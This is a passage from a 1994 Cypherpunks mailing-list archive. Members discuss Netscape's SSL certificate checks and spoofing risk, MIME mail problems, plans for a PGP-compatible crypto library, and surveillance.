certificate > and the server? Does X.509 include an internet address like mcom.com, > and the Netscape client checks that this matches the address of the > server it is connecting to? I am not very familiar with the certificate > format but I had the impression that it used a very different naming > scheme. > > Or does the client accept any valid certificate without regard to the > connection if any between the name in the certificate and the server to > which it is connected? This whole area was left undefined in the SSL > spec but will be important for interoperability. 
> > Hal > > -----BEGIN PGP SIGNATURE----- > Version: 2.6 > > iQBVAwUBLu5AkhnMLJtOy9MBAQEFQgH/dmiiEjycULNdDCNiU8SkoB57bHv9W5Lc > d+K7cBqq0ZknCwXtqZtbPTR7d8F1z0WFbMlP6QF3zywVz2GrDIg5kg== > =qQ9u > -----END PGP SIGNATURE----- From the spec, the appendix on certificates: Certificates are validated using a few straightforward steps. First, the signature on the certificate is checked and if invalid, the certificate is invalid (either a transmission error or an attempted forgery occurred). Next, the CertificateInfo::issuer field is verified to be an issuer that the application trusts (using an unspecified mechanism). The CertificateInfo::validity field is checked against the current date and verified. Here is what we do in Netscape (for now). We have imbedded a set of certificates in the client. The certificates are for issuers of certificates that "we" trust. Any server which is certified by one of these issuers will be automatically trusted by the Netscape Navigator... Admittedly this is primitive, but it's a start. --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html From kipp at warp.mcom.com Wed Dec 14 13:36:06 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Wed, 14 Dec 94 13:36:06 PST Subject: BofA+Netscape Message-ID: <9412142134.AA20544@warp.mcom.com> In article <199412132218.QAA06065 at pentagon.io.com>, you write: > jamesd at netcom.com (James A. Donald) writes: > [regarding Netscape and IETF work...] > > > > Perry, they are not in trouble. They are the number one supplier > > of the internet killer app. > > They are the supplier of the current app-du-jour. What things look like in > five months is another issue completely. > > > The plug for crypto that they have placed in Netscape 0.96 is > > the number one force bringing crypto awareness to the masses.
> > Increasing use of PGP is the number one force bringing crypto awareness to > the masses, Netscape is just bringing bad crypto to the masses. > > > He said that Netscape would look at IPSP when it was beyond > > the "near" phase. [...] The correct response is "Gee that is great. > > Here are some working demo systems, and some slabs of documentation." > > No, the correct response is to stop idiotic measures before they build up > enough inertia behind them to make it difficult to prevent mistakes from > being made. It is interesting that the creators of Netscape quite > frequently harp on "it is us against the goliath of Microsoft, so we > deserve the support of the net" and then they go out and do exactly the > sort of thing that makes Microsoft so unpopular; they take advantage of > their market position to force bad technology on others. If the technology is so "bad", would someone please be so kind as to inform us what is so "bad" about it? We have a solution for a piece of the security puzzle: transport security. We admit its limitations. People keep saying it's "bad". Please put some meat behind the commentary: Is it insecure? If so, how? Is there some cipher technology that it absolutely must support? If so, which one? why? etc. --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html From mccoy at io.com Wed Dec 14 13:57:06 1994 From: mccoy at io.com (Jim McCoy) Date: Wed, 14 Dec 94 13:57:06 PST Subject: Less Flaming, More Civility In-Reply-To: <199412142125.NAA05427@netcom9.netcom.com> Message-ID: <199412142156.PAA00947@pentagon.io.com> tcmay at netcom.com (Timothy C. May) writes: [...] > This is not a flame, but there sure has been an increase in the > frequency of this strange MIME messages lately. Probably because that is the direction mail is going.
If you can't do it too bad, but don't expect everyone else to wait around for you to catch up. Time to move your mail into the early 90s and get a MIME-aware mail agent... jim From perry at imsi.com Wed Dec 14 14:07:21 1994 From: perry at imsi.com (Perry E. Metzger) Date: Wed, 14 Dec 94 14:07:21 PST Subject: Less Flaming, More Civility In-Reply-To: <199412142125.NAA05427@netcom9.netcom.com> Message-ID: <9412142205.AA15948@snark.imsi.com> Timothy C. May says: > > This was one of those "MIME" things I got, that tell me to "Hit any > key to go on," "Now press ^H-Alt-Hyper-Abort to return to the main > menu." It wasn't real mime -- the content type was listed as TEXT/PLAIN; charset=US-ASCII with a base64 content transfer encoding, but the contents were not seven bit ascii. I have no idea what the thing was. .pm From jcorgan at netcom.com Wed Dec 14 14:11:09 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Wed, 14 Dec 94 14:11:09 PST Subject: BofA+Netscape Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >> Wasn't edlin based on the Unix ed? > >Nope. It's very similar to the CP/M `ed'. (I hesitate to say >"identical" since I haven't touched a CP/M system since 1984..), but >the first time I used edlin a couple years ago to edit an autoexec.bat >file, I had CP/M flashbacks... My mistake, I _did_ mean to say CP/M. 
======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLu9qpE1Diok8GKihAQHH/AP/WlodSYb1Zsv2Uj7X/P5NYR0/61EvUaVv s4cnmNPA1irg6QkvQJTS8JaUCAz1DI6pBQP6URlCBPqhjMsJFO8cBP/cyRQYteb+ ppjMi3KKEQmO1psHT+2XVMYHOpQOC1Q+s8BDmtUhrC5FnNf9pXTa622Hz6uPc3+d hUmumhDjuCk= =zHoM -----END PGP SIGNATURE----- From alano at teleport.com Wed Dec 14 14:14:37 1994 From: alano at teleport.com (Alan Olsen) Date: Wed, 14 Dec 94 14:14:37 PST Subject: rad Message-ID: <199412142214.OAA04594@desiree.teleport.com> >I wish the NSA executives would come out of the closet... Don't you know they are supposed to not ask and not tell? ];> (Sorry... Someone had to say it.) | "Encryption ROT13s your mind." | alano at teleport.com | |"Would you rather be tortured by the government | Disclaimer: | |forces or the people's liberation army?" -mklprc | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| From lmccarth at bali.cs.umass.edu Wed Dec 14 14:22:43 1994 From: lmccarth at bali.cs.umass.edu (L. McCarthy) Date: Wed, 14 Dec 94 14:22:43 PST Subject: MIME (again) In-Reply-To: <199412142156.PAA00947@pentagon.io.com> Message-ID: <199412142217.RAA18572@bali.cs.umass.edu> -----BEGIN PGP SIGNED MESSAGE----- Jim McCoy writes: > tcmay at netcom.com (Timothy C. May) writes: > [...] > > This is not a flame, but there sure has been an increase in the > > frequency of this strange MIME messages lately. > > Probably because that is the direction mail is going. If you can't do it > too bad, but don't expect everyone else to wait around for you to catch > up. 
Time to move your mail into the early 90s and get a MIME-aware mail > agent... I'm using a version of ELM which claims to be MIME-compliant and usually is, but all I saw in Peter Cassidy's message was a collection of random-looking extended-ASCII characters. Usually when something arrives in a locally-unsupported MIME format (like Amanda's GIF a while back), I just get an "unrecognized format" error message. I didn't see any error messages at all this time, just a meaningless jumble of characters (different, incidentally, from the PGP-ciphertext-like characters Tim quoted). We have enough dumb flamewars raging on this list right now; let's not revive an old one. - -L. Futplex McCarthy; PGP key by finger or server "The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." --FBI Dir. Freeh -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLu9u4Wf7YYibNzjpAQEUBwP/fwjNOFefKF+fpNnBGyAaU8nOFuLMABuq dj/NUMLR7ZrEi7k7HMPNl5F+RyERGOVemWmowh0ZNHy9uVkNk5OtriptbnQCQDWl hEv7Vn+K9PfAy0kLUFLYzY1kUQbgQFHzr5npLgfqQ6S4PBVtAdIJyHcKv4RgCNMM 0cCaMVM1r5M= =+lPD -----END PGP SIGNATURE----- From bshantz at spry.com Wed Dec 14 14:23:59 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Wed, 14 Dec 94 14:23:59 PST Subject: Less Flaming, More Civility Message-ID: <9412142219.AA08224@homer.spry.com> <---- Begin Included Message ----> Return-Path: To: tcmay at netcom.com (Timothy C. May) >Timothy C. May says: >> >> This was one of those "MIME" things I got, that tell me to "Hit any >> key to go on," "Now press ^H-Alt-Hyper-Abort to return to the main >> menu." Perry Metzger wrote: >It wasn't real mime -- the content type was listed as >TEXT/PLAIN; charset=US-ASCII >with a base64 content transfer encoding, but the contents were not >seven bit ascii. I have no idea what the thing was.
I thought it was just gibberish since none of my parsers (MIME or otherwise) recognized it as anything valuable. So, I deleted it. That filter worked fine. :-) -- Brad From merriman at metronet.com Wed Dec 14 14:25:00 1994 From: merriman at metronet.com (David K. Merriman) Date: Wed, 14 Dec 94 14:25:00 PST Subject: Big Brother database Message-ID: <199412142224.AA17766@metronet.com> -----BEGIN PGP SIGNED MESSAGE----- > >> >Do we then have a de facto (cardless) national ID? I think so. >> >> You got it, Bunky. > >There's an article in Forbes (the latest copy?) about a company that's >making thermal scanning devices which can identify people via the pattern >of blood vessels in their face. The advantage of this system over >fingerprinting is that it can be done without letting the target know he >or she's being identified. Oh, hot diggitey - just what we *always* needed..... Recycled signature follows :-) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLu8mOREpP7+baaPtAQHgjQP/e+eHxzEKuigSihr/wYfUiUrF2fKzI04U r7rQESL4GNG7UOJOisTmSbp9YYB1fMlAPgu0JkWk22YxbgqXIPMnVhyfsWjzH0d8 z5EZ3/8F+MgXqTowY2weuWvsUx8VKFbHsePDemaKjIAEaRUz7R0kVbpMc57XUFMY 9LLKfAYswiQ= =GEuy -----END PGP SIGNATURE----- - - - - - - - - - - - - - - - - - - - - - - - - - - Finger merriman at fohnix.metronet.com for PGP public key and fingerprint. PGP encrypted Email welcome, encouraged, and preferred. "Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From dave at marvin.jta.edd.ca.gov Wed Dec 14 14:25:34 1994 From: dave at marvin.jta.edd.ca.gov (Dave Otto) Date: Wed, 14 Dec 94 14:25:34 PST Subject: Less Flaming, More Civility In-Reply-To: <199412142156.PAA00947@pentagon.io.com> Message-ID: <9412142224.AA16253@marvin.jta.edd.ca.gov> -----BEGIN PGP SIGNED MESSAGE----- on Wed, 14 Dec 1994 15:56:52 -0600 (CST) mccoy at io.com wrote: > tcmay at netcom.com (Timothy C. May) writes: > [...] 
> > This is not a flame, but there sure has been an increase in the > > frequency of this strange MIME messages lately. > > Probably because that is the direction mail is going. If you can't do it > too bad, but don't expect everyone else to wait around for you to catch > up. Time to move your mail into the early 90s and get a MIME-aware mail > agent... This IS a flame. It must be nice to be a sysadmin of a net where you have the time to run around and make sure all your users have access to MIME-aware mail agents. I only manage 50 users on three flavors of U*NX using 5 different terminal emulators, and just can't seem to find the time. Maybe I can talk the tax-payers of CA into paying me overtime to do this. Gee I'm really sorry I couldn't add a graphic to this message. I guess us neanderthals just don't have it together. BTW, with your superior sense of technology, I'm quite shocked at the lack of signature on your missive. Dave Otto -- dave at marvin.jta.edd.ca.gov -- daveotto at acm.org "Pay no attention to the man behind the curtain!" [the Great Oz] finger DaveOtto at ACM.org/or server for PGP 2.6 key <0x3300e841> fingerprint = 78 71 3A 5B FD 8A 9A F1 8F BC E8 6A C7 BD A4 DD -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLu9wEyuceIAzAOhBAQFzKwP/ZMEIA9IBkEtDK0Tf2TAdS7U+IlX2XN19 jmZxnejpzf/t2zxKc3cEQ9C1VRt7UjVbCYehAjoW9hCycnxLVrlN1+HX9i2oVu4h V338Hfk8RjGX8VcNtI0OrpmJ4LV71IqFNA3vS7QbRWD8qJXIYKYxJXI9OVVSct2E e27rnsNzEO8= =+RaW -----END PGP SIGNATURE----- From nobody at jpunix.com Wed Dec 14 14:29:58 1994 From: nobody at jpunix.com (Anonymous) Date: Wed, 14 Dec 94 14:29:58 PST Subject: pgp library Message-ID: <199412142216.QAA07230@jpunix.com> -----BEGIN PGP SIGNED MESSAGE----- Jim McCoy responds: > In addition to this, the code really sucks as far as modularity > goes. The next big version of PGP, which is supposed to include > library hooks, etc., will probably not be out for five or six > months. 
I do know of some people who are interested in working on > a PGP compatible library of crypto code, but I am not quite sure > what the status of that project is at this time... This is really a shame, because at the current time one of the most lacking aspects of most crypto software is the key management interface. Encrypting and decrypting pgp format messages is easily accomplished in an acceptable manner using the actual pgp binary. However, writing a decent key-management interface is practically impossible when your only interaction with the PGP key-management code is via the system() function call. Of course, shelling out to the PGP binary isn't the only solution. It's not impossible to create a simple library for encrypting and decrypting pgp format messages (there's PGPTools, and you can roll your own). But you are doubly screwed because the PGP development team has made it clear that the keyring file format will change in 3.0. Who wants to spend time writing a key management API (which, I admit, is NOT trivial...) which is guaranteed not to work in the next version of PGP? Why spend the effort to write a decent PGP front-end, which would necessarily include a key-management interface, when 1) Any effort expended in writing your own library or sprucing up PGPTools is supposedly being duplicated by the PGP team as we speak, and 2) your code is going to break anyway... ? PGP front-ends aren't the only application type whose progress is being slowed by this situation. IMHO, any app that uses PK-crypto should support PGPformat keys, even if it's output isn't designed to be fed into PGP. Don't get me wrong. I understand how difficult it is to do this and I am not ragging on the PGP developers for being slow or lazy or anything like that (I know they are underpaid). BUT, somebody must write a PGP library if we are to see major advancement in the penetration of crypto software into the mainstream. The question is, who is writing it? 
It almost seems as if PGP development is now happening in secret, and nobody really knows what the status is on pgp 3.0 and the rumored library. There are people on this list who know, but nobody is telling. If the PGP people really are making progress on a PGP library, we need to know. We can probably help. If not, we also need to know so we can write one. Phase (yes you too can have a pseudonym) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLu9kW5Ot8/1bCL+9AQGHaQP/dEaZ+3h/o8AB/gu0VLOjs14F8cgUwkm2 zpqgqFmh6Bna3GzANxSqf7R6Idmwp+y6hzk9YbDiItCE+r0inv9tp0pAE7JlPLg1 bWxM2Nd8r+ZpKhLExepNftJ9iiBewCtWNg9ylxs78VR3QjeKLBWlpcPODeIa2C0S kZlqVBwUBKY= =s1Nh -----END PGP SIGNATURE----- From jcorgan at netcom.com Wed Dec 14 14:31:45 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Wed, 14 Dec 94 14:31:45 PST Subject: A short primer on algebra Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >In the interest of good mathematical terminology, here is a short >primer on the most basic algebraic structures. The definitions are >not complete but rather evocative and are designed to prevent >confusion.
Thanks...now if only I were able to go back to the cpunks meeting and listen to your presentation with this knowledge in hand :) ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLu9qJ01Diok8GKihAQGTvwP+Iy1yGbs/g0eVz6AJM/qQevYC6l5PVU7N 3XenXt7osO6gASd1NS6Pmfg2EQ/W3ArXgGY5TCL+1d7f6tBv5aUqqQg4Z1/ZJMln 8LAFVbDQIKkLbv/pz+1MqH8/DlEifQJAbNAiQBb/EC7S6J7EyrdIRAMNZy8reWWn AXadYEKOZH0= =EHV/ -----END PGP SIGNATURE----- From bshantz at spry.com Wed Dec 14 14:36:36 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Wed, 14 Dec 94 14:36:36 PST Subject: Less Flaming, More Civility Message-ID: <9412142232.AA08487@homer.spry.com> On the subject of flaming... "It is better to remain silent and be thought a fool than to speak up and remove all doubt." Can't remember who said it. -- Brad From hfinney at shell.portal.com Wed Dec 14 14:36:53 1994 From: hfinney at shell.portal.com (Hal) Date: Wed, 14 Dec 94 14:36:53 PST Subject: Clarification of my remarks about Netscape Message-ID: <199412142236.OAA21214@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- From: kipp at warp.mcom.com (Kipp E.B. Hickman) > From the spec, the appendix on certificates: > > Certificates are validated using a few straightforward steps. First, > the signature on the certificate is checked and if invalid, the > certificate is invalid (either a transmission error or an attempted > forgery occurred). Next, the CertificateInfo::issuer field is verified > to be an issuer that the application trusts (using an unspecified > mechanism). The CertificateInfo::validity field is checked against the > current date and verified.
> > Here is what we do in Netscape (for now). We have imbedded a set of > certificates in the client. The certificates are for issuers of > certificates that "we" trust. Any server which is certified by one of > these issuers will be automatically trusted by the Netscape > Navigator... > > Admittedly this is primitive, but it's a start. Thanks, I had overlooked that in the appendix. I notice you left off the next paragraph: Finally, the CertificateInfo::subject field is checked. This check is optional and depends on the level of trust required by the application using SSL. This subject field would hold the distinguished name of the server. That is pretty important to check! Otherwise anybody with any old certificate will fool you. In your appendix D when you describe the man in the middle attack, you say: The man in the middle operates by pretending to be the real server to the client. With SSL this attack is impossible because of the usage of server certificates. During the security connection handshake the server is required to provide a certificate that is signed by a certificate authority. Contained in the certificate is the server's public key as well as its name and the name of the certificate issuer. The client verifies the certificate by first checking the signature and then verifying that the name of the issuer is somebody that the client trusts. This is in accord with your description above. Note that the only name check mentioned is the name of the issuer. But later, in analyzing this attack, you say: If the certificate provided by the bad guy is legitimate, but for the bad guy instead of for the real server, then the signature will pass but the name check will fail Here you must mean a different name check, the optional one that checks the subject field. So this analysis is somewhat inconsistent with the procedure I quoted just above. 
Also, when you describe the subject name check as "optional" and depending on the required level of trust, perhaps you should say explicitly that if you don't do it you are vulnerable to a man in the middle attack. Actually, the attack is more general than that: if I could intercept connections to your server and use my own certificate to make the user think he is securely talking to you then I don't actually have to involve you at all. I am not a man in the middle, I am a spoofer pretending to be you. And you have marked the important step in the protocol which would check for this as optional. It appears from your docs that the Netscape client has a File menu item that brings up a Document Information dialog box which displays the distinguished names of the certificate issuer and of the subject (the owner of the key). This does provide a way of checking that you are securely connected to the server that you expect (assuming that the name is recognizable to the user). But it sounds like this is not something which the customer sees automatically. Again, this seems like an important security aspect which should be displayed more prominently. BTW, what do you see in the dialog when you connect securely to mcom.com? What is the subject name in your certificate? I hope these comments are helpful to you. I am surprised that you published this spec only after distributing implementations of it. This will probably make it hard to change. Usually it is better to do the review before implementation rather than afterwards.
Hal Finney hfinney at shell.portal.com -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLu9zThnMLJtOy9MBAQEVPgH+KObAFiOsALCGokUzk7gsqpnVEda85MUD 5LU5P2GjFhmR5msBKr6uuDKSrodUl69bq0/CfpE3qYSzcz7SGPrrag== =ivlO -----END PGP SIGNATURE----- From bshantz at spry.com Wed Dec 14 14:38:43 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Wed, 14 Dec 94 14:38:43 PST Subject: MIME (again) Message-ID: <9412142234.AA08572@homer.spry.com> >I'm using a version of ELM which claims to be MIME-compliant and usually is, >but all I saw in Peter Cassidy's message was a collection of random-looking >extended-ASCII characters. Usually when something arrives in a locally- >unsupported MIME format (like Amanda's GIF a while back), I just get an >"unrecognized format" error message. I didn't see any error messages at all >this time, just a meaningless jumble of characters (different, incidentally, >from the PGP-ciphertext-like characters Tim quoted). Hey, I've figured it out!!! It's the AOL Good Times virus!!! (**WINK**) We've all been had!!! Oh, sorry, I panicked. :-) -- Brad From DBERLIN at peddie.k12.nj.us Wed Dec 14 14:44:15 1994 From: DBERLIN at peddie.k12.nj.us (DBERLIN at peddie.k12.nj.us) Date: Wed, 14 Dec 94 14:44:15 PST Subject: rad Message-ID: <9411147874.AA787456009@PEDDIE.K12.NJ.US> I wish the NSA executives would come out of the closet... That's nice From tcmay at netcom.com Wed Dec 14 14:58:44 1994 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 14 Dec 94 14:58:44 PST Subject: Strange MIME messages In-Reply-To: <9412142205.AA15948@snark.imsi.com> Message-ID: <199412142253.OAA15404@netcom11.netcom.com> Perry E. Metzger wrote: > Timothy C. May says: > > > > This was one of those "MIME" things I got, that tell me to "Hit any > > key to go on," "Now press ^H-Alt-Hyper-Abort to return to the main > > menu."
> > It wasn't real mime -- the content type was listed as > TEXT/PLAIN; charset=US-ASCII > > with a base64 content transfer encoding, but the contents were not > seven bit ascii. I have no idea what the thing was. My system marked it as MIME, as the attachment below will show. (To Jim McCoy: My system is in fact capable of handling MIME, but clearly "elm," which I and a lot of other people use, sees messages like this differently from what some others see.) When I quoted the attached junk, it put it in slightly different form than it was originally. Here's what I saw on my screen, cut-and-pasted: M 97 Dec 14 Peter F Cassidy (26) Re: Less Flaming, More Civility [This shows that elm marked it as MIME, the "M," even though Perry's system said it was not true MIME.] Date: Wed, 14 Dec 1994 16:18:21 +0001 (EST) From: Peter F Cassidy Subject: Re: Less Flaming, More Civility To: "Timothy C. May" Cc: "Timothy C. May" , cypherpunks at toad.com, tcmay at netcom.com . JE$W\)"F27!UU\WP0,Hc)l(:f-U>3b^3%|?S/AloU *tsa00U]q[B}l5pv(3TLMI*W>h>3b^3%|?S/AloU dXs]r\kZZ{>HqMV-4A$pGEg8SI3 Ja,1gZ ,L:x7QI5^l b6?v E]$[V*K^mr:kfpR [some whitespace deleted] Press any key to return to index. [end of what I saw on the screen.] -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks.
FAQ available at ftp.netcom.com in pub/tc/tcmay From ianf at sydney.sgi.com Wed Dec 14 15:07:47 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Wed, 14 Dec 94 15:07:47 PST Subject: rad In-Reply-To: <9412142136.AA05403@komets.k12.cfa.org> Message-ID: <9412150959.ZM11151@wiley.sydney.sgi.com> On Dec 15, 8:45am, ndibble at komets.k12.cfa.org wrote: > I wish the NSA executives would come out of the closet... A couple of months ago there was some discussion of this on sci.crypt, as it is widely known that most of the TLAs do have Internet feeds nowadays. The main reason why no one from the NSA comments is simply because there is a perception that anything they say will be taken as NSA policy, disclaimers notwithstanding. Whether this would really happen is debatable, although my personal feeling is that it probably would. In an informational vacuum, people tend to jump to all sorts of conclusions based on inadequate evidence, and this situation would be no different. Ian. From sleas at d.umn.edu Wed Dec 14 15:23:34 1994 From: sleas at d.umn.edu (shawn leas) Date: Wed, 14 Dec 94 15:23:34 PST Subject: pgp lib Message-ID: <199412142323.RAA18339@ub.d.umn.edu> -----BEGIN PGP SIGNED MESSAGE----- > Don't get me wrong. I understand how difficult it is to do this and I > am not ragging on the PGP developers for being slow or lazy or > anything like that (I know they are underpaid). BUT, somebody must > write a PGP library if we are to see major advancement in the > penetration of crypto software into the mainstream. The question is, > who is writing it? It almost seems as if PGP development is now > happening in secret, and nobody really knows what the status is on pgp > 3.0 and the rumored library. There are people on this list who know, > but nobody is telling. If the PGP people really are making progress > on a PGP library, we need to know. We can probably help. If not, we > also need to know so we can write one. Hear, hear! I agree.
There are those who know, and to merely shut out all the expertise that might be on this mailing list is nonsense. I think the pgp library approach is very interesting. It could make pgp almost as common as winsock. We know that there is vast interest in finding a good front-end for pgp. The thing is, no one wants to dig around in code that utilizes poor modularity and try to flesh out an API. Once 3.0 comes out, one could build an app under windows using a PGP v2.x DLL, and a newly made PGP v3 DLL that would handle all kinds of keyfiles, a one step option to convert keyfiles, etc... I think the idea of writing a PGP DLL while the format will change in v3 of PGP is still feasible. Just use it again for backwards compatibility. a PGWINP.EXE, a PGPV2.DLL, and a PGPV3.DLL. Or whatever. I've only had experience in UN*X, and maybe I'm oversimplifying everything. But, then again, what is ever simple when you have the trusty old 'windoze' GPF errors. I much prefer the unix 'segmentation fault (core dumped)'. Anyway, I will happily stand corrected on anything I say. Remember, just an idea! #include #include #include #include -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLu99gCdA5IMp25vRAQFM7gf9Fmzx1ueMjuh9iORMQG03+33Z9DRUsL7W s8AFAQCHEwSSLgCNUZBQoRXhgb56c1z+Wvjhk6FvZTF6GyMqdF/8pkJTeQl2tHgo ayX61LDPqu7Xlx5tDyBblfJZ0kJJpF/SIpBe6dUIquSq5NxHodNcH8UmWNXzJ7LO 9fYl5/UJozyqLZHFPISNI/yIZtMJmFn1ogzIFagxrF4YxUVGe6+UAw+ZYfxiYYfb 8yVDdfmCkcjk3ksEcFtgmXs1ZJwAZ8B1IVeAWuJZSxSsO9Au6sO3q3rtFLEY3Vgu Ml45vI9gTJDlR0lwB0tAfx/R/VDfr2ji5Bra27ru69NUvt2zB54pMg== =Jx1p -----END PGP SIGNATURE----- From storm at marlin.ssnet.com Wed Dec 14 15:30:03 1994 From: storm at marlin.ssnet.com (Don Melvin) Date: Wed, 14 Dec 94 15:30:03 PST Subject: PGP Speaks!
(well...speech :-) In-Reply-To: <199412141734.LAA21890@zoom.bga.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <199412141734.LAA21890 at zoom.bga.com>, you wrote: > > Any cypherpunks who would like to do public demonstrations or talks is > invited to attend the sixth annual RobotFest held here in Austin, TX. > It will be held in the city coliseum on April 1 & 2. If interested then > please contact me through e-mail or call voice to 512-458-5818. This brings up a question: I've been thinking about offering to give talks to some of the local groups about computer security, privacy, and encryption, with emphasis on PGP. Myself not being the most knowledgeable on this list and never wanting to re-invent a working wheel, Has anyone developed a 60 to 90 minute presentation outline they'd like to share with the list? Thanks! -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBLu9s1rU8rMgiP9PxAQEXcAL/RWqW0msZGjKBPd5q/lPVL0JL9DTEVsVa 1dimDy6+hA4S6ArsGJyUTY0zIcBpJdC3s8Pdyuj+stcFsp61/Nx3ATrB7mWsDciv uNybEdrto/Hx3kYmOBjQIkpcDEixENw9 =mYir -----END PGP SIGNATURE----- From anonymous-remailer at shell.portal.com Wed Dec 14 15:33:06 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Wed, 14 Dec 94 15:33:06 PST Subject: mime Message-ID: <199412142332.PAA26126@jobe.shell.portal.com> > Probably because that is the direction mail is going. If you can't > do it too bad, but don't expect everyone else to wait around for you > to catch up. Time to move your mail into the early 90s and get a > MIME-aware mail agent... Ah, a refreshing sentiment ;) There is an EXCELLENT article in this month's Scientific American which touches upon this issue. "Ensuring the Longevity of Digital Documents". It mentions how a Shakespeare sonnet written four centuries ago is still readable. Data stored/formatted in completely cutting edge ways from a decade or two ago is in danger of becoming unreadable.
(8" floppy disks, paper tape, CDC 876 mag tapes anybody?) From mccoy at io.com Wed Dec 14 15:42:48 1994 From: mccoy at io.com (Jim McCoy) Date: Wed, 14 Dec 94 15:42:48 PST Subject: pgp library In-Reply-To: <199412142216.QAA07230@jpunix.com> Message-ID: <199412142342.RAA13299@pentagon.io.com> nobody at jpunix.com (Anonymous) writes: > Jim McCoy responds: > > [...] I do know of some people who are interested in working on > > a PGP compatible library of crypto code, but I am not quite sure > > what the status of that project is at this time... > > This is really a shame, because at the current time one of the most > lacking aspects of most crypto software is the key management > interface. A key-management module is planned for this library. Something that takes the key management stuff out of the various places in the code it is scattered and into its own is one of the goals of the project. > [...] But you are doubly screwed because the PGP development > team has made it clear that the keyring file format will change in > 3.0. [...] > Who wants to spend time writing a key management API (which, I admit, > is NOT trivial...) which is guaranteed not to work in the next version > of PGP? It is not necessarily guaranteed to not work. We have been in contact with members of the PGP development team, and may be able to emulate much of their API as things develop. Either way, this is not just a project to develop an updated PGPTools; we hope to have a general purpose crypto library including better math routines, generalized key management, support for multiple public-key and symmetrical ciphers, and hooks for various APIs at different levels. > PGP front-ends aren't the only application type whose progress is > being slowed by this situation. IMHO, any app that uses PK-crypto > should support PGPformat keys, even if it's output isn't designed to > be fed into PGP. Either that, or PGP should learn to use a key standard that might not necessarily be its own.
Key management issues are one of the primary goals for Eclipse and hopefully some of the IETF work in this arena in recent months will help us in determining a direction to work in. Either way, while we want to support as much PGP functionality as possible I doubt we will shackle ourselves with the liabilities of blindly following only the PGP developers when deciding what to do.

jim

From jdwilson at gold.chem.hawaii.edu Wed Dec 14 16:27:51 1994
From: jdwilson at gold.chem.hawaii.edu (NetSurfer)
Date: Wed, 14 Dec 94 16:27:51 PST
Subject: (fwd) I don't use PGP. (Was:I NUKED PGP.)
In-Reply-To: <199412141817.AA11248@access1.digex.net>
Message-ID:

On Wed, 14 Dec 1994, Black Unicorn wrote:

> I'm a Mac user.
>
> MacPGP is a general nightmare. For those of us who have shell accounts,

Have you checked out the Viacrypt MacPGP? If so, do you find the same complaints with it as well?

-NetSurfer

#include
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
== = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 >
" " o " |P. O. Box 15432 | finger for full PGP key >
" " / \ " |Honolulu, HI 96830 |====================================>
\" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com >
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

From jdwilson at gold.chem.hawaii.edu Wed Dec 14 16:48:44 1994
From: jdwilson at gold.chem.hawaii.edu (NetSurfer)
Date: Wed, 14 Dec 94 16:48:44 PST
Subject: Less Flaming, More Civility
In-Reply-To: <199412142156.PAA00947@pentagon.io.com>
Message-ID:

On Wed, 14 Dec 1994, Jim McCoy wrote:

> Probably because that is the direction mail is going. If you can't do it too bad, but don't expect everyone else to wait around for you to catch up. Time to move your mail into the early 90s and get a MIME-aware mail agent...

But if you are not including an enhanced attachment i.e. binary file, why not just send it as a standard mail message?
MIME messages are difficult at best to forward, for example.

-NetSurfer

#include
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
== = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 >
" " o " |P. O. Box 15432 | finger for full PGP key >
" " / \ " |Honolulu, HI 96830 |====================================>
